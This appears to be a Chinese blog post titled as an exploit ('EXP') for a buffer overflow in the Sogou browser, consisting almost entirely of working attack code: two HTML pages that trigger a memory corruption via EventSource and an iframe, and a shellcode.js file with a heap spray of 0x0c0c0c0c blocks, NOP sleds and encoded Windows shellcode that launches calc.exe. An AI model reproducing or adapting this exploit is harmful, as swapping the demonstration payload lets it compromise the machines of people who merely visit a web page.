搜狗浏览器缓冲区溢出漏洞EXP

  1. <!–test2.html–>
  2. <html>
  3. <body>
  4. <script>
  5. top.source = new EventSource(“aaat.htm”);
  6. top.source.onerror = function(err) {
  7. top.finish();
  8. };
  9. </script>
  10. </body>
  11. </html>
  12. —————-
  13. <!–test.html–>
  14. <html>
  15. <body>
  16. <iframe id=”test” width=”1″ height=”1″> </iframe>
  17. <script type=”text/javascript” src=”shellcode.js”></script>
  18. <script>
  19. var source;
  20. shellcode();
  21. function timer(){
  22. over();
  23. }
  24. function runTest(){
  25. document.getElementById(“test”).src = “test2.html”;
  26. }
  27. function finish(){
  28. document.body.removeChild(document.getElementById(“test”));
  29. setTimeout(timer,1000);
  30. //gc();
  31. }
  32. runTest();
  33. </script>
  34. <A HREF=”test.html”> go </A>
  35. </body>
  36. <html>
  37. —————-
  38. //shellcode.js
  39. function gc() {
  40. if (typeof GCController !== “undefined”)
  41. GCController.collect();
  42. else {
  43. function gcRec(n) {
  44. if (n < 1)
  45. return {};
  46. var temp = {i: “ab” + i + (i / 100000)};
  47. temp += “foo”;
  48. gcRec(n-1);
  49. }
  50. for (var i = 0; i < 1000; i++)
  51. gcRec(10)
  52. }
  53. }
  54. function shellcode() {
  55. var shell = unescape(“%u6060%u96e9%u0000%u5600%uc931%u8b64%u3071%u768B%u8b0C%u1c76%u468b%u8b08%u207e%u368b%u3966%u184f%uf275%uc35e%u8b60%u246c%u8b24%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u37e3%u8b49%u8b34%uee01%uff31%uc031%uacfc%uc084%u0a74%ucfc1%u010d%ue9c7%ufff1%uffff%u7c3b%u2824%ude75%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u89e8%u2444%u611c%uadc3%u5250%ua7e8%uffff%u89ff%u8107%u08c4%u0000%u8100%u04c7%u0000%u3900%u75ce%uc3e6%u19e8%u0000%u9800%u8afe%u7e0e%ue2d8%u8173%u00ec%u0000%u8900%ue8e5%uff5d%uffff%uc289%ue2eb%u8d5e%u047d%uf189%uc181%u0008%u0000%ub6e8%uffff%uebff%u5b0e%uc031%u5350%u55ff%u9004%u6161%uc031%ue8c3%uffed%uffff%u6163%u636c%u652e%u6578%u0000”);
  56. var block = unescape(“%u0c0c%u0c0c”);
  57. var nops = unescape(“%u9090%u9090%u9090”);
  58. while (block.length <0x4000) block += block;
  59. block=block.substring(0x90);
  60. memory = new Array(1000);
  61. var shellstr=new Array(3);
  62. shellstr[0]=block;
  63. shellstr[1]=nops;
  64. shellstr[2]=shell;
  65. var i;
  66. for (i=0;i<0x1000;i++) memory[i] =shellstr.join(“”);
  67. }
  68. function over(){
  69. var str=unescape(“%u0c0c%u0c0c”);
  70. var str=unescape(“%u0c0c%u0c0c”);
  71. strb=””;
  72. for(i=0;i<0x10000;++i){
  73. if(i<0x40) strb=strb+str;
  74. var sdiv=document.createElement(“div”);
  75. sdiv.innerText=strb;
  76. if(source.readyState==0x0c0c0c0c) {
  77. //alert(“over ok! run calc.exe!”);
  78. url=source.URL;
  79. }
  80. }
  81. }
  82. //http://forum.sysinternals.com/sogou-explorer-buffer-overflow-vulnerability_topic27040.html
  83. //http://sebug.net/vuldb/ssvid-24265
发表评论?

0 条评论。

发表评论